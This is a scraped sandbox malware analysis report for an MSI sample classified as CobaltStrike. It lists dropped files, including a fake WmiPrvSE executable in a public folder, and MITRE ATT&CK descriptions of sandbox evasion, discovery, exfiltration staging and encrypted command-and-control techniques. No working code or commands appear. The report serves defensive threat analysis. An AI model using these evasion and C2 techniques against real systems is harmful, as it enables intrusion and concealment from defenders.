Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1eSOBjseu2.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\643eaa.rbs

C:\Config.Msi\643eac.rbs

C:\Users\Public\NDTCN1.dat

C:\Users\Public\WmiPrvSE.bat

C:\Users\Public\WmiPrvSE.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zihtbja.0sf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gd1t0ou.o1c.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nzahhr5.qw3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbluiyvv.gx4.ps1

Windows Analysis Report
1eSOBjseu2.msi

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre